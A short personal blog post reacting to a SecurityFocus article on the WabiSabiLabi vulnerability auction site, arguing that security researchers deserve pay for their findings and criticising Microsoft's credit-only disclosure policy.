I was reading through an article on
Securityfocus about the new vulnerability auction site
WabiSabiLabi. Basically theres a lot of commotion because people are scared that organized crime (and other bad people) will be able to buy these vulnerabilities and use them in targeted attacks. Now I can see that happening, but it causes me to stop and think.
Any true 'organized crime' group probably doesn't need to buy these vulnerabilities because they have their own hackers, and they more-than-likely have their own vuln's. Maybe it would save them time to just spend $2000 and get a PoC, but I don't think they would need it.
Maybe I'm a little biased about this article, but every blog I read about it is saying how finally researchers have a chance to earn something from their work. Damn right! Why should you spend x amount of hours researching a vulnerability, then notify the vendor (who probably wont take action soon, if ever) and get nothing out of it? I like the idea of actually getting paid for your research, especially since not everybody has a high paying job.
My favorite quote from the article:
"We do not believe that offering compensation for vulnerability information is the best way we can help protect our customers," the software giant said in a statement sent to SecurityFocus. "Our policy is to credit finders who report vulnerabilities to us in a responsible manner."
Also, I'm a Microsoft customer, I feel that if they paid for vulnerabilities they would have a lot more submissions, which would in turn make a more secure operating system (aka protecting their customers)
I know I would much rather get 'credit' from Microsoft as opposed to money for rent....